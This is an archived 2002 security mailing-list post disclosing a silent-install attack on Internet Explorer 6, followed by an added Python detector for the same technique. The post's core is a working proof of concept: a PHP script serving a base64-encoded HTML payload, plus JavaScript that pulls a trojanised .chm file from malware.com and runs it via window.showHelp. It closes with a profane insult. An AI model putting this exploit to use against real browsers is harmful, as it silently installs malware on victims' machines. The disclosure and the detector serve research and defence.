http-equiv_at_excite.com
Date: Mon Aug 12 2002 - 21:36:26 CDT


    Monday, August 12, 2002

    Yet another silent delivery and installation of an executable on the
    target computer using Internet Explorer 6. This can be achieved by
    reversing the following:

    http://online.securityfocus.com/bid/5350

    And:

    HTM. In order to achieve the required results as outlined in the
    above, we must determine the location of the Temporary Internet File
    [TIF] folders. This can only be achieved if we can physically open
    up our file from within and read its location. Technically that can
    only be achieved if we have a security dialogue prompt asking us for
    permission. If we elect to open the file through acceptance of the
    security warning dialogue, it is opened from within the TIF by
    whatever program is associated with that file.

    Okay:

    Okay. HTM. HTM files are associated with Internet Explorer. We force
    our *.htm file open via a combination of server `misconfiguration`
    and our PHP 'package' as below:

    <?
    function malware()
    {
    header("Content-type: text/html");
    header("Content-Disposition: attachment");
    echo base64_decode(
    'PGltZyBkeW5zcmM9Imh0dHA6Ly93d3cubWFsd2FyZS5jb20vbW'.
    'Fsd2FyZS9tYWx3YXJlLmNobSIgd2lkdGg9MSBoZWlnaHQ9MT4N'.
    'Cg0KPFNDUklQVD4NCg0KLy8gNy4wMi4wMiBodHRwOi8vd3d3Lm'.
    '1hbHdhcmUuY29tDQoNCi8vIHlvdSBtYXkgY29uc2lkZXIgd3Jp'.
    'dGluZyBzZXZlcmFsIGxpbmVzDQovLyBpbiBjYXNlIG1hbHdhcm'.
    'UuY2htIGFycml2ZXMgYXMgWzFdIG9yIFsyXSBldGMNCg0KZnVu'.
    'Y3Rpb24gbWFsd2FyZSgpDQp7DQpzPWRvY3VtZW50LlVSTDsNCn'.
    'BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7'.
    'DQpwYXRoPXVuZXNjYXBlKHBhdGgpOw0KZG9jdW1lbnQud3JpdG'.
    'UoJzxGT1JNIG5hbWU9Im1hbHdhcmUiIEFDVElPTj0iamF2YXNj'.
    'cmlwdDp3aW5kb3cuc2hvd0hlbHAoZG9jdW1lbnQuZm9ybXNbMF'.
    '0uZWxlbWVudHNbMF0udmFsdWUpIj4nKTsNCmRvY3VtZW50Lndy'.
    'aXRlKCc8Zm9ybT48aW5wdXQgdHlwZT0iaGlkZGVuIiAgc2l6ZT'.
    '0iNDAiIG1heGxlbmd0aD0iODAiIHZhbHVlPSInK3BhdGgrJ1xc'.
    'bWFsd2FyZVsxXS5jaG0iPjwvZm9ybT4nKTsNCnNldFRpbWVvdX'.
    'QoJ2RvY3VtZW50Lm1hbHdhcmUuc3VibWl0KCknLDEwMDAwKTsN'.
    'CiB9IA0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwyNTAwKTsgIA'.
    '0KPC9TQ1JJUFQ+DQogDQoNCg=='.'');}
    { malware(); }
    ?>

      <iframe src=<? echo $PHP_SELF ?> width=1 height=1>

    Where our PHP 'package' contains our now run-of-the-mill scripting to
    determine our TIF location and our old friend the trojanised *.chm
    file as follows:

    <img dynsrc="http://www.malware.com/malware/malware.chm" width=1 height=1>

    <SCRIPT>

    // 7.02.02 http://www.malware.com

    function malware()
    {
    // document.URL is the file's own location inside the TIF once it has
    // been opened from the security warning; keep everything up to the
    // last backslash to get the TIF folder
    s=document.URL;
    path=s.substr(-0,s.lastIndexOf("\\"));
    path=unescape(path);
    // the form action hands the computed *.chm path to the HTML Help engine
    document.write('<FORM name="malware" ACTION="javascript:window.showHelp(document.forms[0].elements[0].value)">');
    document.write('<form><input type="hidden" size="40" maxlength="80" value="'+path+'\\malware[1].chm"></form>');
    setTimeout('document.malware.submit()',10000);
    }
    setTimeout("malware()",2500);
    </SCRIPT>

    note: file path for *.chm must be long as we are now operating off
    the server and from within the TIF

    What this does is generate the default security warning for *.htm
    files:

    [screen shot: http://www.malware.com/malwarez.png 7KB]

    Should we elect to open it, we are once again able to determine our
    TIF location where our *.chm is now residing too and fire our
    scripting to locate and call it.

    [screen shot: http://www.malware.com/zerawlam.png 7KB]

    Notes:

    1. As indicated this is the reverse for:
    http://online.securityfocus.com/bid/5350. In this instance the
    default is the security warning which should be disengaged to allow
    this to fail.
    2. Tested series of win98 machines, Internet Explorer 6.0.2600 and all
    of its bandages
    4. We anxiously await the release of Internet Explorer 6 SP1.

    Special Note: would the gang of Nigerians who have taken up squatting
    on these security mailing lists and who feel it is necessary to
    continuously request our assistance with their multiple millions of
    dollars every day, kindly fuck off and die. Thank you.

    End Call

    --
    http://www.malware.com
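As an added defender-side example (not part of http-equiv's post), the following Python inspects a raw HTTP response for the combination the post relies on: an HTML body delivered with Content-Disposition: attachment, together with the dynsrc *.chm prefetch, the javascript: form action that calls window.showHelp, and the TIF path derivation from document.URL. The sample response is constructed here and its host name is a placeholder; the indicator names are this example's own.

```python
import re

# Body indicators taken from the decoded payload in the post above: dynsrc
# prefetch of a *.chm, a javascript: form action calling window.showHelp,
# and a local path derived from document.URL up to the last backslash.
INDICATORS = {
    "dynsrc_chm_prefetch": re.compile(r'dynsrc\s*=\s*"?[^"\s>]+\.chm', re.I),
    "showhelp_form_action": re.compile(r'action\s*=\s*"javascript:window\.showHelp\(', re.I),
    "tif_path_from_document_url": re.compile(r'document\.URL.*?lastIndexOf\("\\\\"\)', re.I | re.S),
}

def parse_response(raw: bytes):
    """Split a raw HTTP response into a lowercase header dict and body text."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.decode("latin-1").split("\r\n")[1:]:  # skip status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body.decode("latin-1", errors="replace")

def inspect_response(raw: bytes) -> list[str]:
    """Return the names of the indicators present in one HTTP response."""
    headers, body = parse_response(raw)
    findings = []
    ctype = headers.get("content-type", "").lower()
    cdisp = headers.get("content-disposition", "").lower()
    # HTML that is forced to download instead of rendering is the trigger
    # for the *.htm security warning described in the post.
    if ctype.startswith("text/html") and cdisp.startswith("attachment"):
        findings.append("html_served_as_attachment")
    for name, pattern in INDICATORS.items():
        if pattern.search(body):
            findings.append(name)
    return findings

# Constructed sample response (not captured traffic); host is a placeholder.
SAMPLE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
    b"Content-Disposition: attachment\r\n\r\n"
    b'<img dynsrc="http://hosting.example/m/malware.chm" width=1 height=1>\r\n'
    b"<SCRIPT>\r\ns=document.URL;\r\n"
    b'path=s.substr(-0,s.lastIndexOf("\\\\"));\r\n'
    b"document.write('<FORM name=\"malware\" ACTION=\"javascript:window.showHelp("
    b"document.forms[0].elements[0].value)\">');\r\n</SCRIPT>\r\n"
)
# Constructed benign page for comparison.
BENIGN = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><p>hello</p></html>"
```

Running inspect_response over the constructed sample reports all four indicators, while the benign page reports none.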